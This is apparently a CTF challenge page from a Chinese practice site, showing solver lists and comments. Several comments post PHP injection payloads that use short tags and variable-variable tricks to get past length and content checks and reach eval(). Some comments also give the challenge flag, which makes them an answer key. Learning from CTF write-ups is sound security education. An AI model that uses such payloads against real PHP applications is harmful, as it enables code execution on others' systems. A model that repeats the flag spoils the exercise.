评分(6)
解题动态
ljy1997 攻破了该题 1天前
杰哥 攻破了该题 2天前
周文君 攻破了该题 2天前
不要逃课 攻破了该题 4天前
DcSyaA 攻破了该题 6天前
dacming9527 攻破了该题 7天前
话中语 攻破了该题 7天前
william5678 攻破了该题 8天前
vedkiyolo 攻破了该题 8天前
ggtom 攻破了该题 9天前
whitetower 攻破了该题 10天前
hulihaha 攻破了该题 10天前
fengci 攻破了该题 10天前
123-喻天心 攻破了该题 13天前
003-胡云涛 攻破了该题 13天前
085-文睿 攻破了该题 13天前
129-蔡国滨 攻破了该题 13天前
OvOawa 攻破了该题 14天前
zhengjim 攻破了该题 15天前
评论
Daniel2023 2年前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 2年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
110-没办法 2年前
举报
flag{78062956}
wxy1343 3年前
举报
flag{78062956}
w登临意 3年前
举报
好难
阿Q啊 3年前
举报
但是不精通php不会写,就很难受,只能看别人的writeup的payload
阿Q啊 3年前
举报
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
哎嘿嘿1314 3年前
举报
牛皮
golangboy 3年前
举报
新知识get了
malajiba 3年前
举报
这个好mark